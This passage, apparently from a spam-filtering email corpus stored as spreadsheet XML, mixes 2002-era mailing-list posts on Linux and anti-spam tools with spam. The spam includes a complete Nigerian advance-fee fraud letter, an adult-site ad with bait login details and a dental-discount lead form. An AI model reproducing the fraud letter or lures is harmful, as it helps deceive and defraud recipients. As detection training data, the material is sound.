 &gt; context of software, centralized variables can only contain one valid
 &gt; value at a time. That limits us to only representing information A)
 &gt; according to the beliefs of a single agency, and B) that changes more
 &gt; slowly than it takes to propagate. Nevertheless, centralization is the
 &gt; basis for today?s most popular architectural style for developing
 &gt; network applications: client-server interaction using request-response
 &gt; communication protocols.
 I think the ability to maintain an inconsistent database
 is key to decentralization. 
 Databases enforce consistenty with every transaction.
 Bounded transactions, like an ATM, enforce consistency
   by have some play with time and value
 Most people keep inconsistent data in their heads, it's
   called congnitive dissonance theory
 Most businesses keep inconsistent data, documents, tationale
   and ideas to support their work activities, it's called real life.
 I don't think it matters so much where it's located, i.e.
 decentralization. I think that decentralization is the workaround
 from technical limitations.  The fallout being that the only way
 inconsistent information spaces can be maintained is by 
 protecting them through a set of trust barriers and boundaries. 
 The local information when combined with the technical
 troubles of providing "just enough" forced synchronization
 to remote information provide workable data consistenty, i.e.
 enforcing local constraints or ignoring global ones when
 concerns are more immedidate.  
 Tolerating temporary, irreconcilable deviations is how
 people cope, otherwise you'd be like Nick Gatsby unnecessarily
 pre-occupied with a spot of shaving cream on McKee's neck
 who thinks that if he can just wipe that spot off that the
 whole world would be a little more perfect and everything,
 including his pre-occupation with Daisy, would consistently
 be in its proper place.
 Greg
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] Change timeout setting???
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a semi-followup on my previous question. I am running razor-check
 through a sendmail milter (smrazor http://www.sapros.com/smrazor/ ) and have
 set up my milter timeouts to 20sec connect and 30 sec response. The problem
 is that there is another timeout setting for razor-check that I am unable to
 locate. My razor-agent.log is now getting filled with :
 check[6149]: [ 3] Timed out (15 sec) while reading from honor.cloudmark.com.
 So the question is, is there a razor-agent.conf file setting to increase
 this timeout value? I have this problem on 2 different servers now (as
 apparently ubik.cloudmark and apt.cloudmark are refusing connections) ......
 Sven
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Great Health Benefits
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dwindows-=
 1252"&gt;
 &lt;meta name=3D"GENERATOR" content=3D"Microsoft FrontPage 4.0"&gt;
 &lt;meta name=3D"ProgId" content=3D"FrontPage.Editor.Document"&gt;
 &lt;title&gt;Save up to 80&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;div align=3D"center"&gt;
   &lt;center&gt;
   &lt;table style=3D"BORDER-COLLAPSE: collapse" borderColor=3D"#111111" cellS=
 pacing=3D"0" cellPadding=3D"0" width=3D"516" bgColor=3D"#ffffff" border=3D=
 "0"&gt;
     &lt;tbody&gt;
       &lt;tr&gt;
         &lt;td width=3D"517"&gt;
           &lt;p align=3D"center"&gt;&lt;span style=3D"VERTICAL-ALIGN: bottom"&gt;&lt;b&gt;&lt;f=
 ont color=3D"#ff0000" size=3D"7"&gt;Save&lt;/font&gt;&lt;/b&gt;&lt;font color=3D"#ff0000"&gt;
           &lt;/font&gt;&lt;font size=3D"6"&gt;&lt;b&gt;up to&lt;/b&gt;&lt;/font&gt; &lt;b&gt;&lt;font size=3D"7"&gt;=
 80&lt;/font&gt;&lt;/b&gt;&lt;font size=3D"7"&gt;%&lt;/font&gt;&lt;/span&gt;&lt;/p&gt;
         &lt;/td&gt;
       &lt;/tr&gt;
       &lt;tr&gt;
         &lt;td vAlign=3D"top" width=3D"517"&gt;
           &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font size=3D"5"&gt;On&lt;/font&gt;&lt;/b&gt; &lt;b&gt;&lt;font s=
 ize=3D"7"&gt;&amp;nbsp;Dental&lt;/font&gt;&lt;/b&gt;
           &lt;b&gt;&lt;font size=3D"7"&gt;&amp;nbsp;Services&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
         &lt;/td&gt;
       &lt;/tr&gt;
       &lt;tr&gt;
         &lt;td width=3D"517"&gt;
           &lt;hr width=3D"99%" color=3D"#000000" SIZE=3D"1"&gt;
         &lt;/td&gt;
       &lt;/tr&gt;
       &lt;tr&gt;
         &lt;td width=3D"517"&gt;
           &lt;div align=3D"center"&gt;
             &lt;table style=3D"BORDER-COLLAPSE: collapse" borderColor=3D"#111=
 111" height=3D"178" cellSpacing=3D"0" cellPadding=3D"0" width=3D"495" bord=
 er=3D"0"&gt;
               &lt;tbody&gt;
                 &lt;tr&gt;
                   &lt;td vAlign=3D"top" align=3D"middle" width=3D"495" colSpa=
 n=3D"3"&gt;&lt;b&gt;&lt;font size=3D"5"&gt;Only
                     &lt;font color=3D"#ff0000"&gt;$19.95&lt;/font&gt; per month, per H=
 ousehold&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;
                   &lt;td vAlign=3D"top" align=3D"middle" width=3D"495" colSpa=
 n=3D"3"&gt;&lt;b&gt;&lt;font size=3D"5"&gt;Or
                     &lt;font color=3D"#ff0000"&gt;$11.95&lt;/font&gt; per month for
                     individual......&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;
                   &lt;td vAlign=3D"bottom" width=3D"17" height=3D"61"&gt;&amp;nbsp;&lt;=
 /td&gt;
                   &lt;td vAlign=3D"bottom" width=3D"234" height=3D"61"&gt;
                     &lt;ul&gt;
                       &lt;li&gt;&lt;font size=3D"2"&gt;No Waiting Period&lt;/font&gt;
                       &lt;li&gt;&lt;font size=3D"2"&gt;No Limits on Visits or Services=
 &lt;/font&gt;
                       &lt;li&gt;&lt;font size=3D"2"&gt;Orthodontics Included&lt;/font&gt;
                       &lt;li&gt;&lt;font size=3D"2"&gt;Cosmetic Dentistry Included&lt;/fo=
 nt&gt;&lt;/li&gt;
                     &lt;/ul&gt;
                   &lt;/td&gt;
                   &lt;td vAlign=3D"bottom" width=3D"244" height=3D"61"&gt;
                     &lt;ul&gt;
                       &lt;li&gt;&lt;font size=3D"2"&gt;Pre existing Conditions Convere=
 d&lt;/font&gt;
                       &lt;li&gt;&lt;font size=3D"2"&gt;No Deductibles...No Claims Form=
 s&lt;/font&gt;
                       &lt;li&gt;&lt;font size=3D"2"&gt;No Age Limits&lt;/font&gt;
                       &lt;li&gt;&lt;font size=3D"2"&gt;All Specialist Included&lt;/font&gt;&lt;=
 /li&gt;
                     &lt;/ul&gt;
                   &lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;
                   &lt;td width=3D"495" colSpan=3D"3" height=3D"15"&gt;
                     &lt;hr width=3D"99%" color=3D"#000000" SIZE=3D"1"&gt;
                   &lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;
                   &lt;td width=3D"495" colSpan=3D"3" height=3D"23"&gt;
                     &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font color=3D"#000080" size=3D=
 "4"&gt;Value
                     Added Benefits FREE with your Discount Dental Services=
 &lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
                   &lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;
                   &lt;td width=3D"495" colSpan=3D"3" height=3D"64"&gt;
                     &lt;ul&gt;
                       &lt;li&gt;&lt;b&gt;&lt;font color=3D"#ff0000" size=3D"2"&gt;FREE&lt;/font=
 &gt;&lt;font size=3D"2"&gt;
                         Vision Care Plan ... Over 12,000 Providers Nationw=
 ide&lt;/font&gt;&lt;/b&gt;
                       &lt;li&gt;&lt;b&gt;&lt;font color=3D"#ff0000" size=3D"2"&gt;FREE&lt;/font=
 &gt;&lt;font size=3D"2"&gt;
                         Discount Prescription Drug Card ... Over 50,000 Re=
 tail
                         Pharmacy Locations&lt;/font&gt;&lt;/b&gt;
                       &lt;li&gt;&lt;b&gt;&lt;font color=3D"#ff0000" size=3D"2"&gt;FREE&lt;/font=
 &gt;&lt;font size=3D"2"&gt;
                         Chiropractic Care Plan ... Over 5,000 Participatin=
 g
                         Doctors Nationwide&lt;/font&gt;&lt;/b&gt;&lt;/li&gt;
                     &lt;/ul&gt;
                   &lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;
                   &lt;td width=3D"495" colSpan=3D"3" height=3D"15"&gt;
                     &lt;hr width=3D"99%" color=3D"#000000" SIZE=3D"1"&gt;
                   &lt;/td&gt;
                 &lt;/tr&gt;
               &lt;/tbody&gt;
             &lt;/table&gt;
           &lt;/div&gt;
         &lt;/td&gt;
       &lt;/tr&gt;
       &lt;tr&gt;
         &lt;td width=3D"517"&gt;
           &lt;p align=3D"center"&gt;&lt;b&gt;Tell me more about how to SAVE up to 80% =
 on all
           my Dental Services.&lt;/b&gt;&lt;/p&gt;
         &lt;/td&gt;
       &lt;/tr&gt;
       &lt;tr&gt;
         &lt;td width=3D"517"&gt;
           &lt;form action=3D"mailto:bestservice4u5@excite.com" method=3D"post=
 " encType=3D"text/plain"&gt;
             &lt;div align=3D"center"&gt;
               &lt;table style=3D"BORDER-COLLAPSE: collapse" borderColor=3D"#1=
 11111" cellSpacing=3D"0" cellPadding=3D"0" width=3D"500" border=3D"0"&gt;
                 &lt;tbody&gt;
                   &lt;tr&gt;
                     &lt;td align=3D"right" width=3D"143"&gt;&lt;font face=3D"Arial"=
  size=3D"2"&gt;First
                       Name:&lt;/font&gt;&lt;/td&gt;
                     &lt;td width=3D"357"&gt;&lt;input size=3D"42" name=3D"First_Nam=
 e"&gt;&lt;/td&gt;
                   &lt;/tr&gt;
                   &lt;tr&gt;
                     &lt;td align=3D"right" width=3D"143"&gt;&lt;font face=3D"Arial"=
  size=3D"2"&gt;Last
                       Name:&lt;/font&gt;&lt;/td&gt;
                     &lt;td width=3D"357"&gt;&lt;input size=3D"42" name=3D"Last_Name=
 "&gt;&lt;/td&gt;
                   &lt;/tr&gt;
                   &lt;tr&gt;
                     &lt;td align=3D"right" width=3D"143"&gt;&lt;font face=3D"Arial"=
  size=3D"2"&gt;Email
                       Address:&lt;/font&gt;&lt;/td&gt;
                     &lt;td width=3D"357"&gt;&lt;input size=3D"42" name=3D"Email_Add=
 ress"&gt;&lt;/td&gt;
                   &lt;/tr&gt;
                   &lt;tr&gt;
                     &lt;td width=3D"500" colSpan=3D"2"&gt;How would you like to =
 receive
                       the information?&lt;/td&gt;
                   &lt;/tr&gt;
                   &lt;tr&gt;
                     &lt;td align=3D"right" width=3D"143"&gt;&lt;font face=3D"Arial"=
  size=3D"2"&gt;Phone:&lt;/font&gt;&lt;/td&gt;
                     &lt;td width=3D"357"&gt;&lt;input type=3D"checkbox" value=3D"YE=
 S" name=3D"Reach_Me_By_Phone"&gt;&lt;font face=3D"Arial" size=3D"2"&gt;if
                       so, your phone # &lt;/font&gt;&lt;input size=3D"24" name=3D"P=
 hone_Number"&gt;&lt;/td&gt;
                   &lt;/tr&gt;
                   &lt;tr&gt;
                     &lt;td align=3D"right" width=3D"143"&gt;&lt;font face=3D"Arial"=
  size=3D"2"&gt;Email:&lt;/font&gt;&lt;/td&gt;
                     &lt;td width=3D"357"&gt;&lt;input type=3D"checkbox" value=3D"YE=
 S" name=3D"Reach_Me_Using_Email"&gt;&lt;/td&gt;
                   &lt;/tr&gt;
                   &lt;tr&gt;
                     &lt;td align=3D"right" width=3D"143"&gt;&lt;font face=3D"Arial"=
  size=3D"2"&gt;Fax:&lt;/font&gt;&lt;/td&gt;
                     &lt;td width=3D"357"&gt;&lt;input type=3D"checkbox" value=3D"YE=
 S" name=3D"Reach_Me_Using_My_Fax"&gt;if
                       so, your Fax # &lt;input size=3D"25" name=3D"Fax_Number=
 "&gt;&lt;/td&gt;
                   &lt;/tr&gt;
                   &lt;tr&gt;
                     &lt;td align=3D"right" width=3D"143"&gt;&lt;font face=3D"Arial"=
  size=3D"2"&gt;Snail
                       Mail:&lt;/font&gt;&lt;/td&gt;
                     &lt;td width=3D"357"&gt;&lt;input type=3D"checkbox" value=3D"YE=
 S" name=3D"Send_Me_Information_By_Mail"&gt;if
                       yes then supply us with a mailing address&lt;/td&gt;
                   &lt;/tr&gt;
                   &lt;tr&gt;
                     &lt;td align=3D"right" width=3D"143"&gt;&lt;font face=3D"Arial"=
  size=3D"2"&gt;Street
                       Address:&lt;/font&gt;&lt;/td&gt;
                     &lt;td width=3D"357"&gt;&lt;input size=3D"42" name=3D"Street_Ad=
 dress"&gt;&lt;/td&gt;
                   &lt;/tr&gt;
                   &lt;tr&gt;
                     &lt;td align=3D"right" width=3D"143"&gt;&lt;font face=3D"Arial"=
  size=3D"2"&gt;City:&lt;/font&gt;&lt;/td&gt;
                     &lt;td width=3D"357"&gt;&lt;input size=3D"15" name=3D"City"&gt; &lt;f=
 ont face=3D"Arial"&gt;&lt;font size=3D"2"&gt;State:
                       &lt;/font&gt;&lt;input size=3D"2" name=3D"State"&gt;&lt;font size=3D=
 "2"&gt; ZIP&lt;/font&gt;&lt;/font&gt;
                       &lt;input size=3D"10" name=3D"Zip_Code"&gt;&lt;/td&gt;
                   &lt;/tr&gt;
                   &lt;tr&gt;
                     &lt;td align=3D"right" width=3D"143"&gt;&amp;nbsp;&lt;/td&gt;
                     &lt;td width=3D"357"&gt;&amp;nbsp;&lt;/td&gt;
                   &lt;/tr&gt;
                 &lt;/tbody&gt;
               &lt;/table&gt;
             &lt;/div&gt;
             &lt;p align=3D"center"&gt;&lt;input type=3D"submit" value=3D"YES - Send=
  me FREE information " name=3D"B1"&gt;&lt;/p&gt;
           &lt;/form&gt;
           &lt;p&gt;&amp;nbsp;&lt;/p&gt;
         &lt;/td&gt;
       &lt;/tr&gt;
       &lt;tr&gt;
         &lt;td width=3D"517"&gt;&amp;nbsp;&lt;/td&gt;
       &lt;/tr&gt;
       &lt;tr&gt;
         &lt;td width=3D"517"&gt;&lt;/FORM&gt;
         &lt;/td&gt;
       &lt;/tr&gt;
       &lt;tr&gt;
         &lt;td width=3D"517"&gt;&lt;/FORM&gt;
         &lt;/td&gt;
       &lt;/tr&gt;
       &lt;tr&gt;
         &lt;td width=3D"517"&gt;&amp;nbsp;&lt;/td&gt;
       &lt;/tr&gt;
       &lt;tr&gt;
         &lt;td width=3D"517"&gt;
           &lt;p align=3D"center"&gt;&lt;/FORM&gt;
           &lt;/p&gt;
         &lt;/td&gt;
       &lt;/tr&gt;
     &lt;/tbody&gt;
   &lt;/table&gt;
   &lt;/center&gt;
 &lt;/div&gt;
 &lt;div align=3D"center"&gt;
   &lt;center&gt;
   &lt;table style=3D"BORDER-COLLAPSE: collapse" borderColor=3D"#111111" cellS=
 pacing=3D"0" cellPadding=3D"0" width=3D"88%" border=3D"0"&gt;
     &lt;tbody&gt;
       &lt;tr&gt;
         &lt;td width=3D"100%"&gt;&lt;/td&gt;
       &lt;/tr&gt;
       &lt;tr&gt;
         &lt;td width=3D"100%"&gt;&lt;/td&gt;
       &lt;/tr&gt;
       &lt;tr&gt;
         &lt;td width=3D"100%"&gt;
           &lt;p align=3D"left"&gt;&lt;font face=3D"Arial" color=3D"#808080" size=3D=
 "1"&gt;&amp;nbsp;We
           are sending this ad to people who have requested information abo=
 ut
           saving on their Dental - Vision Care - Prescription Drugs -
           Chiropractic Care needs. If you have received this in error,&amp;nbs=
 p; &lt;a style=3D"COLOR: #003399" href=3D"mailto:out200120022000@yahoo.com?su=
 bject=3DREMOVE me from your list"&gt;CLICK
           HERE&lt;/a&gt; and we will remove you from our list and we apologize f=
 or any
           inconvenience to you.&lt;/font&gt;&lt;/p&gt;
         &lt;/td&gt;
       &lt;/tr&gt;
     &lt;/tbody&gt;
   &lt;/table&gt;
   &lt;/center&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Immediate Reply Needed
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir,
 I am Dr James Alabi, the chairman of contract
 award and review committee set up by the federal
 government of Nigeria under the new civilian
 dispensation to award new contracts and review
 existing ones.
 I came to know of you in my search for a reliable and
 reputable person to handle a very confidential
 transaction, which involves the transfer of a huge
 sum of money to a foreign account. 
 There were series of contracts executed by a 
 consortium of multi-nationals in the oil industry in
 favor of N.N.P.C. The original values of these 
 contracts were deliberately over invoiced to the sum
 of US$12,320,000.00 (Twelve Million Three Hundred and Twenty Thousand 
 United
 State Dollars). This amount has now been approved and
 is now ready to be transferred being that the
 companies
 that actually executed these contracts have been
 fully Paid and the projects officially commissioned. 
 Consequently, my colleagues and I are willing to 
 transfer the total amount to your account for
 subsequent disbursement, since we as civil servants
 are prohibited by the code of conduct bureau (civil
 service law) from operating and/or opening foreign 
 accounts in our names. Needless to say, the trust
 reposed on you at this juncture is enormous, in 
 return, we have agreed to offer you 20% of the 
 transferred sum, while 10% shall be set aside for
 incidental expenses (internal and external) between
 both parties in the course of the transaction you will
 be mandated to remit the balance to other accounts
 in due course. 
 Modalities have been worked out at the highest level
 of the Ministry of Finance and the Central Bank of 
 Nigeria for the immediate transfer of the funds
 within 7 working days subject to your satisfaction of
 the above stated terms. 
 Our assurance is that your role is risk free. To 
 accord this transaction the legality it deserves and
 for mutual security of the funds the whole approval
 procedures will officially and legally processed
 with your name or the name of any company you may
 nominate as the bonefide beneficiary. 
 Once more I want you to understand that having put
 in over twenty-five years in the civil service of my
 country, I am averse to having my image and career 
 dented. This matter should therefore be treated with
 utmost secrecy and urgency it deserves. 
 Please you should signify your intention to assist
 by sending me a reply to this email to state your position on this
 transaction, if favorable we will take further steps
 to brief you the full details of this viable 
 transaction. 
 I want to assure you that this business proposal is
 100% risk free as we have done our homework
 properly. 
 I quite believe that you will protect our interest
 by taking this deal strictly confidential, as we are
 still in government service, which we intend to
 retire from in full honor.
 Kindly expedite action as we are behind schedule to
 enable us include this transfer in the next batch
 which would constitute the new quarter payments
 for the 2002 financial year. 
 Thank you and God bless.
 Dr James Alabi
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Fw: Re: User Name &amp; Password to Membership To 15 Sites cpunks@minder.net pknkn
</t>
  </si>
  <si>
    <t xml:space="preserve">##################################################
 #                                                #
 #                 Adult Club=99                    #
 #           Offers FREE Membership               #
 #                                                #
 ##################################################
 15 of the Best Adult Sites on the Internet for FREE!
 &gt;&gt;&gt;  INSTANT ACCESS TO ALL SITES NOW
 &gt;&gt;&gt;  Your User Name And Password is.
 &gt;&gt;&gt;  User Name: cpunks@minder.net
 &gt;&gt;&gt;  Password: d0949w4z
 ---------------------------------------
 NEWS 07/01/02
 With just over 2.2 Million Members that signed up for FREE, Last month th=
 ere were 429,947 New=20
 Members. Are you one of them yet???
 ---------------------------------------
 Our Membership FAQ
 Q. Why are you offering free access to 15 adult membership sites for free=
 ?
 A. I have advertisers that pay me for ad space so you don't have to pay f=
 or membership.
 Q. Is it true my membership is for life?
 A. Absolutely you'll never have to pay a cent the advertisers do.
 Q. Can I give my account to my friends and family?=20
 A. Yes, as long they are over the age of 18.
 Q. Do I have to sign up for all 15 membership sites?
 A. No just one to get access to all of them.=20
 Q. How do I get started?=20
 A. Click on one of the following links below to become a member.
 ---------------------------------------
 # 15. &gt; NEW! &gt; Celebs TV=20
 Click Here &gt; http://157.237.128.20/celebst/?aid=3D818932
 =20
 # 14. &gt; NEW! &gt; Naughty Live Cam
 Click Here &gt; http://157.237.128.20/cams/?aid=3D818932
 # 13. &gt; Adults Farm
 Click Here &gt; http://157.237.128.20/farm/?aid=3D818932
 =20
 # 12. &gt; Fetish Door
 Click Here &gt; http://157.237.128.20/fetish/?aid=3D818932
 # 11. &gt; Teen Sex Dolls (Voted Best Adult Site 2001-2002!)
 Click Here &gt; http://157.237.128.20/teen/?aid=3D818932
 =20
 #10. &gt; Sweet Latinas
 Click Here &gt; http://157.237.128.20/latina/?aid=3D818932
 # 9. &gt; Fetishes
 Click Here &gt; http://157.237.128.20/wicked/?aid=3D818932
 =20
 # 8. &gt; Tits Patrol
 Click Here &gt; http://157.237.128.20/tits/?aid=3D818932
 =20
 # 7. &gt; Pinklicious
 Click Here &gt; http://157.237.128.20/pink/?aid=3D818932
 =20
 # 6. &gt; Play House Porn
 Click Here &gt; http://157.237.128.20/play/?aid=3D818932
 =20
 # 5. &gt; Sinful Cherries
 Click Here &gt; http://157.237.128.20/sinful/?aid=3D818932
 =20
 # 4. &gt; Asian Sex Fantasies
 Click Here &gt; http://157.237.128.20/asian/?aid=3D818932
 =20
 # 3. &gt; Hot Stripper Sluts
 Click Here &gt; http://157.237.128.20/stripper/?aid=3D818932
 =20
 # 2. &gt; Lesbian Lace=20
 Click Here &gt; http://157.237.128.20/lesbian/?aid=3D818932
 =20
 # 1. &gt; Gay Porn Club
 Click Here &gt; http://157.237.128.20/stripper/?aid=3D818932
 ---------------------------------------
 Removal Instructions:
 You have received this advertisement because you have opted in to receive=
  free adult internet=20
 offers and specials through our affiliated websites. If you do not wish t=
 o receive further emails or=20
 have received the email in error you may opt-out of our database here htt=
 p://157.237.128.20/optout/=20
 . Please allow 24 hours for removal.
 This e-mail is sent in compliance with the Information Exchange Promotion=
  and Privacy Protection=20
 Act. section 50 marked as 'Advertisement' with valid 'removal' instructio=
 n.
 tosjkmackiswohspfkxywojjgmlr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</si>
  <si>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Space shuttle ready for return
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8399728,1440/
 Date: Not supplied
 After months of repairs to cracked fuel lines, the shuttle prepares for 
 lift-off - an onboard video camera will relay live footage
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Please help a newbie compile mplayer :-)
</t>
  </si>
  <si>
    <t xml:space="preserve">    
  Hello,
          I just installed redhat 7.2 and I think I have everything 
 working properly.  Anyway I want to install mplayer because I heard it 
 can play quicktime movs.  I apt-get source mplayer and dl'd it to 
 /usr/src. 
          I tried to just rpm --rebuild mplayer-20020106-fr1.src.rpm, 
 then I get ; mplayer-20020106-fr1.src.rpm: No such file or directory.
          Any help or a link to some document would be appreciated, Thanks
 -rob
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Dermot Beirne/Dublin/IE/Exel is out of the office.
</t>
  </si>
  <si>
    <t xml:space="preserve">I will be out of the office starting  02/08/2002 and will not return until
 06/08/2002.
 I am out of the office until Tuesday 6th August.   I will reply to messages
 on my return.
 Thank you.
 DermotImportant Email Information
 The information in this email is confidential and may be legally
 privileged. It is intended solely for the addressee. Access to this email
 by anyone else is unauthorized. If you are not the intended recipient, any
 disclosure, copying, distribution or any action taken or omitted to be
 taken in reliance on it, is prohibited and may be unlawful. If you are not
 the intended addressee please contact the sender and dispose of this
 e-mail.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: If You Own A Cell Phone......Please Read..... 26930
</t>
  </si>
  <si>
    <t xml:space="preserve">Unbelievable Prices On Cell Phones And Accessories:
 http://www.chinaniconline.com/sales/
 Hands Free Ear Buds 1.99! 
 Phone Holsters 1.98! 
 Phone Cases 1.98! 
 Car Chargers 1.98! 
 Face Plates As Low As 2.98! 
 Lithium Ion Batteries As Low As 6.94! 
 http://www.chinaniconline.com/sales/
 Click Below For Accessories On All NOKIA, MOTOROLA LG, NEXTEL, 
 SAMSUNG, QUALCOMM, ERICSSON, AUDIOVOX PHONES At Below 
 WHOLESALE PRICES!
 http://www.chinaniconline.com/sales/
 ***NEW*** Now Also: Accessories For PALM III, PALM VII, 
 PALM IIIc, PALM V, PALM M100 &amp; M105, HANDSPRING VISOR, COMPAQ iPAQ*** 
 Car Chargers 6.95! 
 Leather Cases 13.98! 
 USB Chargers 11.98! 
 Hot Sync Cables11.98! 
 http://www.chinaniconline.com/sales/
 ***If You Need Assistance Please Call Us  (732) 751-1457***
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 To be removed from future mailings please send your remove 
 request to: removemenow68994@btamail.net.cn
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: re: domain registration savings
</t>
  </si>
  <si>
    <t xml:space="preserve">
 PUBLIC ANNOUNCEMENT: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http://www.affordable-domains.com today for more info.
 Register your domain name today for just $14.95 at: http://www.affordable-domains.com/  Registration fees include full access to an easy-to-use control panel to manage your domain name in the future.
 Sincerely,
 Domain Administrator
 Affordable Domains
 To remove your email address from further promotional mailings from this company, click here:
 http://www.centralremovalservice.com/cgi-bin/domain-remove.cgi
 (I3-ss1)9302YsCL8-129qkjk2635Okca5-604qkYb2284cVMm7-023uoOI4889tl53
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: people we know on the web
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.bbc.co.uk/radio1/alt/nireland/ni_team.shtml	
 first of a very short series.
 gerry
 _______________________________________________
 Crackmice mailing list
 Crackmice@crackmice.com
 http://crackmice.com/mailman/listinfo/crackmice
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "E" == Eugen Leitl &lt;eugen@leitl.org&gt; writes:
     E&gt; ... Moreover, worms which use email as vector exist *only*
     E&gt; because a single vendor ships mailers with broken default
     E&gt; settings, and insists to make documents executables. This makes
     E&gt; for very bad press, and eventually that vendor is going to wise
     E&gt; up, and stop shipping as many broken wares
 Do you suppose any of us will live long enough to see such a day?
 -- 
 Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications Inc
 Business Innovations Through Open Source Systems: http://www.teledyn.com
 "Computers are useless.  They can only give you answers."(Pablo Picasso)
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,7764729,159/
 Date: 2002-09-11T22:41:04+01:00
 In the second of our series from the GDC Europe, we talk with Microsoft's Bill 
 Fulton about usability testing for games, SCEE's Zeno Colaco about pitching 
 publishers, and Harvey Smith of Ion Storm about emergent game design.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] yast2
</t>
  </si>
  <si>
    <t xml:space="preserve">has anyone had a problem with Yast2 not being able to
 mount a source medium for installing new packages, on
 suse 8.0?
 it finds the directory containing the source, so the
 installation program gets as far as selecting
 packages, and formatting, but then says it can't mount
 the source directory?
 http://digital.yahoo.com.au - Yahoo! Digital How To
 - Get the best out of your PC!
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On 09 September 2002, Tim Peters said:
 &gt; &gt; Would people be interested in the script?  I'd be happy to extricate
 &gt; &gt; it from my local modules and check it into CVS.
 &gt; 
 &gt; Sure!  I think it's relevant, but maybe for another purpose.  Paul Svensson
 &gt; is thinking harder about real people &lt;wink&gt; than the rest of us, and he may
 &gt; be able to get use out of approaches that identify closely related spam.
 &gt; For example, some amount of spam is going to end up in the ham training data
 &gt; in real life use, and any sort of similarity score to a piece of known spam
 &gt; may be an aid in finding and purging it.
 OTOH, look into DCC (Distributed Checksum Clearinghouse,
 http://www.rhyolite.com/anti-spam/dcc/), which uses fuzzy checksums.
 It's quite likely that DCC's checksumming scheme is better than
 something any of us would throw together for personal use (no offense,
 Skip!).  But I have no personal experience of it.
         Greg
 -- 
 Greg Ward &lt;gward@python.net&gt;                         http://www.gerg.ca/
 If it can't be expressed in figures, it is not science--it is opinion.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: req: Falcon's eye
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 2002-07-26 at 12:52, Harri Haataja wrote:
 &gt; Another thing I see in debian but not in my RH boxen.
 &gt; 
 &gt; http://falconseye.sourceforge.net/
 &gt; 
 &gt; It's a GL(?) interface to nethack :)
 Take a look at &lt;http://cachalot.ods.org/&gt;, I have RPMs for RH7.3 there,
 based on (and compatible with) the NH3.x that last appeared in RH7.1
 powertools.  apt'able, of course :)
 -- 
 \/ille Skytt
 ville.skytta at iki.fi
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt;&gt;&gt;&gt;&gt; On Mon, 30 Sep 2002, "Ted" == Ted Cabeen wrote:
   Ted&gt; Here's the code for everybody and the list archives in
   Ted&gt; case anyone wants it in the future.
 Very cool!  I vote for this being added to CVS, any objections?
 --Hal
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">
     Guido&gt; Therefore I propose to nuke GBayes.py, after adding a -u feature.
     Guido&gt; Anyone against?  (I imagine that Skip or Barry might have a stake
     Guido&gt; in GBayes.py; Tim seems to have moved all code he's working to
     Guido&gt; other modules.)
 No argument here.
 Skip
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAtalk] Personal/Site-Wide SA Glitch (Spamassassin+Exim)
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello People,
 I am new to SA but (2) problems I do have.
 I run SA from my own home for personal use and it seems to work but I see this
 in my procmail log:
 &lt;cut&gt;
 procmail: Executing " ~/bin/SpamAssassin/spamassassin -P -c ~/bin/SpamAssassin/rules"
 dccproc: not found
 dccproc: not found
 &lt;cut&gt;
